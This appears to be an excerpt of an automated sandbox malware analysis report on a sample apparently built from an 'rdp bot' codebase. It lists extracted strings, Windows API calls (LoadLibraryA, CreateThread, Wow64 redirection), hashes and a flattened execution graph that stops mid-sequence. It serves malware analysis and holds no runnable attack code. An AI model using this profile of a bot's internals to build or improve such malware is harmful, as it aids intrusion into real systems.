                                                                                                                                                  • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcat
                                                                                                                                                  • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fwprintf$strlen
                                                                                                                                                  • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastLibraryLoadProc
                                                                                                                                                  • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                                                                                                                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                  • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeviceErrorLastQuery
                                                                                                                                                  • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
                                                                                                                                                  • API String ID: 963133057-3473575966
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fwprintf
                                                                                                                                                  • String ID: %*.*s$%-*.*s$%.*s$%S%S
                                                                                                                                                  • API String ID: 968622242-2451587232
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalDeleteSectionfclose
                                                                                                                                                  • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                                                                                                                  • API String ID: 3387974148-4247581856
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00007FF77573A1E8,00000000,?,?,?,00007FF77573A1E0,00007FF775721208,?,?,?,00007FF775721313), ref: 00007FF77572ABC2
                                                                                                                                                  Strings
                                                                                                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF77572AAEB
                                                                                                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF77572AA62
                                                                                                                                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF77572AB5D
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                                                  • API String ID: 544645111-1286557213
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                                                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                                                                                                                  • API String ID: 4242514867-2427012484
                                                                                                                                                  APIs
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Byte$CharMultiWide$Lead_errno
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2766522060-0
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: signal
                                                                                                                                                  • String ID: CCG
                                                                                                                                                  • API String ID: 1946981877-1584390748
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-3474627141
                                                                                                                                                  • Opcode ID: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                                                                                                                                  • Instruction ID: 990a24ab845863bc8f78dff7be9a9ddd3a989a139d2594c5f8fe17280ea376b6
                                                                                                                                                  • Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                                                                                                                                                  • Instruction Fuzzy Hash: 50117363818EC482D6119F1CE0413EAB370FF9E759F515326EBC816624DF39D1528740
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2713391170
                                                                                                                                                  • Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                                                                                                                                  • Instruction ID: 5786aa947d8f2ac02bfbd52b8ce890290e26d63df6a8d11b14e8eb5fdc798935
                                                                                                                                                  • Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                                                                                                                                                  • Instruction Fuzzy Hash: A0F01D67828F8482D2119F18E4002ABB370FF9EB99F615326EBC926664DF3DD5468750
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4064033741
                                                                                                                                                  • Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                                                                                                                                  • Instruction ID: 3767dc32db609e354cea5fbd7401e4a6dddbc083bf2096975ada48ac7bc0c30a
                                                                                                                                                  • Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                                                                                                                                                  • Instruction Fuzzy Hash: 92F01D67828F8482D2119F18E4002ABB370FF9EB99F615326EBC92A624DF3DD5428750
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4283191376
                                                                                                                                                  • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                                                                                                                                  • Instruction ID: bb807f699c65c2c6ec0e1fb34995d23f89f8c70e016855d0de163698ca7b4c78
                                                                                                                                                  • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                                                                                                                                                  • Instruction Fuzzy Hash: 82F01D67828F8482D2119F18E4006ABB370FF9EB99F615326EBC926624DF3DD5428750
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-4273532761
                                                                                                                                                  • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                                                                                                                                  • Instruction ID: fcfabef0832a21fea39cc7cba06a8b4b4705278e56edb2a1ae453d785334a49b
                                                                                                                                                  • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                                                                                                                                                  • Instruction Fuzzy Hash: C8F01D67828F8482D2119F18E4006ABB370FF9EB99F615326EBC926664DF3DD5428750
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2187435201
                                                                                                                                                  • Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                                                                                                                                  • Instruction ID: 083c6f7f693b2c92a7f309027c8ac42e96b6d665bdb8904da7c874df465d9357
                                                                                                                                                  • Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                                                                                                                                                  • Instruction Fuzzy Hash: 5BF01D67828F8482D2119F18E4406ABB370FF9EB99F615326EBC926624DF3DD5428750
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fprintf
                                                                                                                                                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                  • API String ID: 383729395-2468659920
                                                                                                                                                  • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                                                                                                                                  • Instruction ID: dc1d5e0b55c30f8e1c037d66bfc6e554932b3ae9ad0cafa636961c66b32f41a3
                                                                                                                                                  • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                                                                                                                                                  • Instruction Fuzzy Hash: E2F01D67828FC482D2119F18E4002ABB370FF9E799F605326EFC826624DF2DD5428740
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.2510911859.00007FF76A371000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF76A370000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.2510842906.00007FF76A370000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2510930956.00007FF76A380000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2510930956.00007FF76A97C000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2511540643.00007FF76AD95000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2511558001.00007FF76AD9D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2511558001.00007FF76AD9F000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2511586995.00007FF76ADA0000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                  • Associated: 0000000B.00000002.2511601490.00007FF76ADA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff76a370000_shdpeqdz2a54sj46ur0.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                                                                                                                                                  • Instruction ID: ee581a889b3e6210b16c4758912f925931202506863737649525a0b0ba7d6d92
                                                                                                                                                  • Opcode Fuzzy Hash: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                                                                                                                                                  • Instruction Fuzzy Hash: 6DB09232A08641C4F2003F0298412586620AB09700F820071C40C07366CA6C94414730

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:6.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                  Signature Coverage:3.2%
                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                  Total number of Limit Nodes:35
60188->60190 60191 7ff8ba4f1561 60189->60191 60190->60179 60191->60179 60192 7ff8ba4f16cd 60191->60192 60193 7ff8ba4f1292 6 API calls 60192->60193 60193->60183 60195 7ff8ba4f7ad6 60194->60195 60196 7ff8ba4f7b19 60194->60196 60275 7ff8ba4f7720 60195->60275 60198 7ff8ba4f1292 6 API calls 60196->60198 60200 7ff8ba4f7aef 60198->60200 60200->59862 60204 7ff8ba4f3420 60200->60204 60201 7ff8ba4f7b49 _errno _strtoui64 _errno 60201->60200 60202 7ff8ba4f7b7c _errno 60201->60202 60203 7ff8ba4f1292 6 API calls 60202->60203 60203->60200 60317 7ff8ba4f9ff4 60204->60317 60240 7ff8ba4f2e22 60239->60240 60241 7ff8ba4f2dfa 60239->60241 60243 7ff8ba4f1292 6 API calls 60240->60243 60242 7ff8ba4f1292 6 API calls 60241->60242 60244 7ff8ba4f2e14 60242->60244 60245 7ff8ba4f2e3b 60243->60245 60244->59862 60247 7ff8ba4f1d21 InitializeCriticalSectionAndSpinCount 60244->60247 60246 7ff8ba4f1292 6 API calls 60245->60246 60246->60244 60248 7ff8ba4f1d46 CreateThread 60247->60248 60249 7ff8ba4f1dc4 GetLastError 60247->60249 60250 7ff8ba4f1e9c GetLastError 60248->60250 60257 7ff8ba4f1d92 60248->60257 60251 7ff8ba4f1292 6 API calls 60249->60251 60253 7ff8ba4f1292 6 API calls 60250->60253 60258 7ff8ba4f1d9f 60251->60258 60252 7ff8ba4f1f95 60254 7ff8ba4f1292 6 API calls 60252->60254 60253->60257 60255 7ff8ba4f1dbc 60254->60255 60255->59862 60256 7ff8ba4f1292 6 API calls 60256->60255 60257->60252 60257->60258 60258->60255 60258->60256 60276 7ff8ba4f7731 60275->60276 60277 7ff8ba4f7769 60275->60277 60283 7ff8ba4f7409 60276->60283 60279 7ff8ba4f1292 6 API calls 60277->60279 60281 7ff8ba4f7748 60279->60281 60281->60200 60281->60201 60284 7ff8ba4f7421 60283->60284 60285 7ff8ba4f743c 60283->60285 60286 7ff8ba4f7426 60284->60286 60287 7ff8ba4f746f 60284->60287 60288 7ff8ba4f1292 6 API calls 60285->60288 60289 7ff8ba4f74a2 60286->60289 60296 7ff8ba4f742b 60286->60296 60290 7ff8ba4f1292 6 API calls 60287->60290 60294 7ff8ba4f7465 60288->60294 60291 7ff8ba4f1292 6 API calls 60289->60291 60290->60294 
60291->60294 60292 7ff8ba4f750c 60293 7ff8ba4f7513 60292->60293 60292->60294 60298 7ff8ba4f1292 6 API calls 60294->60298 60295 7ff8ba4f74e1 strcmp 60295->60296 60296->60292 60296->60295 60299 7ff8ba4f7529 60298->60299 60299->60281 60318 7ff8ba4fa002 LoadLibraryA 60317->60318 60319 7ff8ba4fa02b 60317->60319 60320 7ff8ba4fa010 60318->60320 60321 7ff8ba4fa02e GetLastError 60318->60321 60319->60321 60322 7ff8ba4f1292 6 API calls 60320->60322 60323 7ff8ba4f1292 6 API calls 60321->60323 60324 7ff8ba4f3434 60322->60324 60323->60324 60361 7ff8bfb8146a 60360->60361 60362 7ff8bfb81590 GetLastError 60360->60362 60487 7ff8bfb84170 GetModuleHandleExA 60361->60487 60364 7ff8bfb81292 19 API calls 60362->60364 60374 7ff8bfb81569 60364->60374 60368 7ff8bfb814a4 strlen 60370 7ff8bfb814bd 60368->60370 60371 7ff8bfb814d3 60368->60371 60369 7ff8bfb81292 19 API calls 60372 7ff8bfb81586 60369->60372 60370->60371 60373 7ff8bfb814c2 strlen 60370->60373 60375 7ff8bfb814f8 strlen fopen 60371->60375 60376 7ff8bfb814d8 strcat strlen 60371->60376 60372->59866 60384 7ff8bfb8ca74 60372->60384 60373->60371 60374->60369 60377 7ff8bfb8165d 60375->60377 60378 7ff8bfb81547 60375->60378 60376->60375 60379 7ff8bfb81292 19 API calls 60377->60379 60380 7ff8bfb81292 19 API calls 60378->60380 60379->60374 60381 7ff8bfb81561 60380->60381 60381->60374 60382 7ff8bfb816cd 60381->60382 60383 7ff8bfb81292 19 API calls 60382->60383 60383->60372 60385 7ff8bfb8ca96 60384->60385 60386 7ff8bfb8cad9 60384->60386 60505 7ff8bfb8c6e0 60385->60505 60388 7ff8bfb81292 19 API calls 60386->60388 60390 7ff8bfb84587 60388->60390 60390->59867 60394 7ff8bfb84bc0 60390->60394 60391 7ff8bfb8cb09 _errno _strtoui64 _errno 60391->60390 60392 7ff8bfb8cb3c _errno 60391->60392 60393 7ff8bfb81292 19 API calls 60392->60393 60393->60390 60547 7ff8bfb844a4 60394->60547 60428 7ff8bfb824ca 60427->60428 60429 7ff8bfb824f2 60427->60429 60430 7ff8bfb81292 19 API calls 60428->60430 60431 7ff8bfb81292 19 API calls 60429->60431 60434 7ff8bfb824e4 
60430->60434 60432 7ff8bfb8250b 60431->60432 60433 7ff8bfb81292 19 API calls 60432->60433 60433->60434 60434->59874 60436 7ff8bfb8a084 GetLastError 60435->60436 60437 7ff8bfb8a006 CreateThread 60435->60437 60440 7ff8bfb81292 19 API calls 60436->60440 60438 7ff8bfb8a052 60437->60438 60439 7ff8bfb8a15c GetLastError 60437->60439 60441 7ff8bfb8a255 60438->60441 60442 7ff8bfb8a05f 60438->60442 60443 7ff8bfb81292 19 API calls 60439->60443 60440->60442 60443->60442 60488 7ff8bfb81486 60487->60488 60489 7ff8bfb841a2 GetLastError 60487->60489 60491 7ff8bfb88571 60488->60491 60490 7ff8bfb81292 19 API calls 60489->60490 60490->60488 60492 7ff8bfb88582 60491->60492 60493 7ff8bfb885b8 60491->60493 60495 7ff8bfb88587 60492->60495 60496 7ff8bfb885e8 60492->60496 60494 7ff8bfb81292 19 API calls 60493->60494 60502 7ff8bfb8149a 60494->60502 60498 7ff8bfb88590 60495->60498 60499 7ff8bfb88618 60495->60499 60497 7ff8bfb81292 19 API calls 60496->60497 60497->60502 60504 7ff8bfb88432 21 API calls 60498->60504 60501 7ff8bfb81292 19 API calls 60499->60501 60501->60502 60502->60368 60502->60374 60503 7ff8bfb88595 60503->60502 60504->60503 60506 7ff8bfb8c6f1 60505->60506 60507 7ff8bfb8c729 60505->60507 60513 7ff8bfb8c3c9 60506->60513 60509 7ff8bfb81292 19 API calls 60507->60509 60511 7ff8bfb8c708 60509->60511 60511->60390 60511->60391 60514 7ff8bfb8c3e1 60513->60514 60515 7ff8bfb8c3fc 60513->60515 60516 7ff8bfb8c3e6 60514->60516 60517 7ff8bfb8c42f 60514->60517 60518 7ff8bfb81292 19 API calls 60515->60518 60519 7ff8bfb8c462 60516->60519 60521 7ff8bfb8c3eb 60516->60521 60520 7ff8bfb81292 19 API calls 60517->60520 60526 7ff8bfb8c425 60518->60526 60522 7ff8bfb81292 19 API calls 60519->60522 60520->60526 60523 7ff8bfb8c4cc 60521->60523 60524 7ff8bfb8c4a1 strcmp 60521->60524 60522->60526 60525 7ff8bfb8c4d3 60523->60525 60523->60526 60524->60521 60528 7ff8bfb81292 19 API calls 60526->60528 60529 7ff8bfb8c4e9 60528->60529 60529->60511 60548 7ff8bfb844db 60547->60548 60549 7ff8bfb844b2 LoadLibraryA 
60547->60549 60550 7ff8bfb844de GetLastError 60548->60550 60549->60550 60551 7ff8bfb844c0 60549->60551 60553 7ff8bfb81292 19 API calls 60550->60553 60552 7ff8bfb81292 19 API calls 60551->60552 60554 7ff8bfb844d9 60552->60554 60553->60554 60693 7ff8bfb3a3da 60692->60693 60694 7ff8bfb3a500 GetLastError 60692->60694 60800 7ff8bfb37140 GetModuleHandleExA 60693->60800 60695 7ff8bfb3a202 6 API calls 60694->60695 60701 7ff8bfb3a4d9 60695->60701 60700 7ff8bfb3a414 strlen 60703 7ff8bfb3a42d 60700->60703 60704 7ff8bfb3a443 60700->60704 60702 7ff8bfb3a202 6 API calls 60701->60702 60707 7ff8bfb3a4f6 60702->60707 60703->60704 60708 7ff8bfb3a432 strlen 60703->60708 60705 7ff8bfb3a468 strlen fopen 60704->60705 60706 7ff8bfb3a448 strcat strlen 60704->60706 60709 7ff8bfb3a5cd 60705->60709 60710 7ff8bfb3a4b7 60705->60710 60706->60705 60707->59884 60716 7ff8bfb394f4 60707->60716 60708->60704 60712 7ff8bfb3a202 6 API calls 60709->60712 60711 7ff8bfb3a202 6 API calls 60710->60711 60713 7ff8bfb3a4d1 60711->60713 60712->60701 60713->60701 60714 7ff8bfb3a63d 60713->60714 60715 7ff8bfb3a202 6 API calls 60714->60715 60715->60707 60717 7ff8bfb39559 60716->60717 60718 7ff8bfb39516 60716->60718 60720 7ff8bfb3a202 6 API calls 60717->60720 60818 7ff8bfb39160 60718->60818 60722 7ff8bfb3952f 60720->60722 60722->59885 60726 7ff8bfb32610 60722->60726 60723 7ff8bfb39589 _errno _strtoui64 _errno 60723->60722 60724 7ff8bfb395bc _errno 60723->60724 60725 7ff8bfb3a202 6 API calls 60724->60725 60725->60722 60860 7ff8bfb37474 60726->60860 60762 7ff8bfb31fea 60761->60762 60763 7ff8bfb32012 60761->60763 60764 7ff8bfb3a202 6 API calls 60762->60764 60765 7ff8bfb3a202 6 API calls 60763->60765 60766 7ff8bfb32004 60764->60766 60767 7ff8bfb3202b 60765->60767 60766->59890 60768 7ff8bfb3a202 6 API calls 60767->60768 60768->60766 60770 7ff8bfb3696a InitializeCriticalSectionAndSpinCount 60769->60770 60771 7ff8bfb36aec GetLastError 60769->60771 60772 7ff8bfb36c08 GetLastError 60770->60772 60773 7ff8bfb36997 
60770->60773 60774 7ff8bfb3a202 6 API calls 60771->60774 60775 7ff8bfb3a202 6 API calls 60772->60775 60776 7ff8bfb369ad CreateThread 60773->60776 60777 7ff8bfb36c26 60773->60777 60786 7ff8bfb36b0a 60774->60786 60775->60777 60786->60772 60801 7ff8bfb37168 60800->60801 60802 7ff8bfb37172 GetLastError 60800->60802 60804 7ff8bfb35fb1 60801->60804 60803 7ff8bfb3a202 6 API calls 60802->60803 60803->60801 60805 7ff8bfb35ff8 60804->60805 60806 7ff8bfb35fc2 60804->60806 60807 7ff8bfb3a202 6 API calls 60805->60807 60808 7ff8bfb36028 60806->60808 60809 7ff8bfb35fc7 60806->60809 60815 7ff8bfb35fdd 60807->60815 60810 7ff8bfb3a202 6 API calls 60808->60810 60811 7ff8bfb36058 60809->60811 60812 7ff8bfb35fd0 60809->60812 60810->60815 60814 7ff8bfb3a202 6 API calls 60811->60814 60817 7ff8bfb35e72 8 API calls 60812->60817 60814->60815 60815->60700 60815->60701 60816 7ff8bfb35fd5 60816->60815 60817->60816 60819 7ff8bfb391a9 60818->60819 60820 7ff8bfb39171 60818->60820 60822 7ff8bfb3a202 6 API calls 60819->60822 60826 7ff8bfb38e49 60820->60826 60825 7ff8bfb39188 60822->60825 60825->60722 60825->60723 60827 7ff8bfb38e7c 60826->60827 60828 7ff8bfb38e61 60826->60828 60831 7ff8bfb3a202 6 API calls 60827->60831 60829 7ff8bfb38eaf 60828->60829 60830 7ff8bfb38e66 60828->60830 60833 7ff8bfb3a202 6 API calls 60829->60833 60832 7ff8bfb38ee2 60830->60832 60839 7ff8bfb38e6b 60830->60839 60838 7ff8bfb38ea5 60831->60838 60834 7ff8bfb3a202 6 API calls 60832->60834 60833->60838 60834->60838 60835 7ff8bfb38f4c 60837 7ff8bfb38f53 60835->60837 60835->60838 60836 7ff8bfb38f21 strcmp 60836->60839 60841 7ff8bfb3a202 6 API calls 60838->60841 60839->60835 60839->60836 60842 7ff8bfb38f69 60841->60842 60842->60825 60861 7ff8bfb374ab 60860->60861 60862 7ff8bfb37482 LoadLibraryA 60860->60862 60863 7ff8bfb374ae GetLastError 60861->60863 60862->60863 60864 7ff8bfb37490 60862->60864 60866 7ff8bfb3a202 6 API calls 60863->60866 60865 7ff8bfb3a202 6 API calls 60864->60865 60867 7ff8bfb32624 60865->60867 60866->60867 
60904 7ff8b915146a 60903->60904 60905 7ff8b9151590 GetLastError 60903->60905 61016 7ff8b915cc60 GetModuleHandleExA 60904->61016 60907 7ff8b9151292 6 API calls 60905->60907 60908 7ff8b9151569 60907->60908 60915 7ff8b9151292 6 API calls 60908->60915 60912 7ff8b91514a4 strlen 60913 7ff8b91514bd 60912->60913 60914 7ff8b91514d3 60912->60914 60913->60914 60916 7ff8b91514c2 strlen 60913->60916 60917 7ff8b91514f8 strlen fopen 60914->60917 60918 7ff8b91514d8 strcat strlen 60914->60918 60919 7ff8b9151586 60915->60919 60916->60914 60920 7ff8b915165d 60917->60920 60921 7ff8b9151547 60917->60921 60918->60917 60919->59895 60927 7ff8b915c974 60919->60927 60922 7ff8b9151292 6 API calls 60920->60922 60923 7ff8b9151292 6 API calls 60921->60923 60922->60908 60924 7ff8b9151561 60923->60924 60924->60908 60925 7ff8b91516cd 60924->60925 60928 7ff8b915c9d9 60927->60928 60929 7ff8b915c996 60927->60929 60931 7ff8b9151292 6 API calls 60928->60931 61034 7ff8b915c5e0 60929->61034 60936 7ff8b915be11 60931->60936 60933 7ff8b915ca09 _errno _strtoui64 _errno 60934 7ff8b915ca3c _errno 60933->60934 60933->60936 60935 7ff8b9151292 6 API calls 60934->60935 60935->60936 60936->59896 60937 7ff8b9159770 60936->60937 61076 7ff8b915cf94 60937->61076 60973 7ff8b9152dfa 60972->60973 60974 7ff8b9152e22 60972->60974 60975 7ff8b9151292 6 API calls 60973->60975 60976 7ff8b9151292 6 API calls 60974->60976 60977 7ff8b9152e14 60975->60977 60978 7ff8b9152e3b 60976->60978 60977->59896 60980 7ff8b9155a84 InitializeCriticalSectionAndSpinCount 60977->60980 60979 7ff8b9151292 6 API calls 60978->60979 60979->60977 60981 7ff8b9155a9f 60980->60981 60982 7ff8b9155ad4 GetLastError 60980->60982 60984 7ff8b9151292 6 API calls 60981->60984 60983 7ff8b9151292 6 API calls 60982->60983 60986 7ff8b9155af2 60983->60986 60985 7ff8b9155ac7 60984->60985 60985->59896 60988 7ff8b9151d21 InitializeCriticalSectionAndSpinCount 60985->60988 60987 7ff8b9151292 6 API calls 60986->60987 60987->60985 61017 7ff8b915cc92 GetLastError 61016->61017 
61019 7ff8b9151486 61016->61019 61018 7ff8b9151292 6 API calls 61017->61018 61018->61019 61020 7ff8b9158ff1 61019->61020 61021 7ff8b9159038 61020->61021 61022 7ff8b9159002 61020->61022 61023 7ff8b9151292 6 API calls 61021->61023 61024 7ff8b9159068 61022->61024 61025 7ff8b9159007 61022->61025 61031 7ff8b915149a 61023->61031 61026 7ff8b9151292 6 API calls 61024->61026 61027 7ff8b9159098 61025->61027 61028 7ff8b9159010 61025->61028 61026->61031 61029 7ff8b9151292 6 API calls 61027->61029 61033 7ff8b9158eb2 8 API calls 61028->61033 61029->61031 61031->60908 61031->60912 61032 7ff8b9159015 61032->61031 61033->61032 61035 7ff8b915c629 61034->61035 61036 7ff8b915c5f1 61034->61036 61038 7ff8b9151292 6 API calls 61035->61038 61042 7ff8b915c2c9 61036->61042 61040 7ff8b915c608 61038->61040 61040->60933 61040->60936 61043 7ff8b915c2fc 61042->61043 61044 7ff8b915c2e1 61042->61044 61047 7ff8b9151292 6 API calls 61043->61047 61045 7ff8b915c32f 61044->61045 61046 7ff8b915c2e6 61044->61046 61048 7ff8b9151292 6 API calls 61045->61048 61049 7ff8b915c362 61046->61049 61053 7ff8b915c2eb 61046->61053 61051 7ff8b915c325 61047->61051 61048->61051 61050 7ff8b9151292 6 API calls 61049->61050 61050->61051 61056 7ff8b9151292 6 API calls 61051->61056 61052 7ff8b915c3cc 61052->61051 61053->61052 61054 7ff8b915c3a1 strcmp 61053->61054 61054->61053 61058 7ff8b915c3e9 61056->61058 61058->61040 61077 7ff8b915cfcb 61076->61077 61078 7ff8b915cfa2 LoadLibraryA 61076->61078 61079 7ff8b915cfce GetLastError 61077->61079 61078->61079 61080 7ff8b915cfb0 61078->61080 61082 7ff8b9151292 6 API calls 61079->61082 61081 7ff8b9151292 6 API calls 61080->61081 61083 7ff8b9159784 61081->61083 61082->61083 61120 7ff8bfb531aa 61119->61120 61121 7ff8bfb532d0 GetLastError 61119->61121 61224 7ff8bfb51e40 GetModuleHandleExA 61120->61224 61123 7ff8bfb52fd2 6 API calls 61121->61123 61131 7ff8bfb532a9 61123->61131 61127 7ff8bfb531e4 strlen 61129 7ff8bfb531fd 61127->61129 61130 7ff8bfb53213 61127->61130 61128 7ff8bfb52fd2 6 
API calls 61132 7ff8bfb532c6 61128->61132 61129->61130 61133 7ff8bfb53202 strlen 61129->61133 61134 7ff8bfb53238 strlen fopen 61130->61134 61135 7ff8bfb53218 strcat strlen 61130->61135 61131->61128 61132->59909 61143 7ff8bfb58ab4 61132->61143 61133->61130 61136 7ff8bfb5339d 61134->61136 61137 7ff8bfb53287 61134->61137 61135->61134 61138 7ff8bfb52fd2 6 API calls 61136->61138 61241 7ff8bfb52fd2 61137->61241 61138->61131 61144 7ff8bfb58b19 61143->61144 61145 7ff8bfb58ad6 61143->61145 61146 7ff8bfb52fd2 6 API calls 61144->61146 61261 7ff8bfb58720 61145->61261 61152 7ff8bfb53501 61146->61152 61149 7ff8bfb58b49 _errno _strtoui64 _errno 61150 7ff8bfb58b7c _errno 61149->61150 61149->61152 61151 7ff8bfb52fd2 6 API calls 61150->61151 61151->61152 61152->59911 61153 7ff8bfb54430 61152->61153 61303 7ff8bfb52174 61153->61303 61189 7ff8bfb52f3a 61188->61189 61190 7ff8bfb52f62 61188->61190 61192 7ff8bfb52fd2 6 API calls 61189->61192 61191 7ff8bfb52fd2 6 API calls 61190->61191 61193 7ff8bfb52f7b 61191->61193 61195 7ff8bfb52f54 61192->61195 61194 7ff8bfb52fd2 6 API calls 61193->61194 61194->61195 61195->59916 61197 7ff8bfb53bc4 GetLastError 61196->61197 61198 7ff8bfb53b46 CreateThread 61196->61198 61200 7ff8bfb52fd2 6 API calls 61197->61200 61199 7ff8bfb53c9c GetLastError 61198->61199 61207 7ff8bfb53b92 61198->61207 61201 7ff8bfb52fd2 6 API calls 61199->61201 61203 7ff8bfb53b9f 61200->61203 61201->61207 61202 7ff8bfb53d95 61207->61202 61207->61203 61225 7ff8bfb51e68 61224->61225 61226 7ff8bfb51e72 GetLastError 61224->61226 61228 7ff8bfb57dd1 61225->61228 61227 7ff8bfb52fd2 6 API calls 61226->61227 61227->61225 61229 7ff8bfb57e18 61228->61229 61230 7ff8bfb57de2 61228->61230 61231 7ff8bfb52fd2 6 API calls 61229->61231 61232 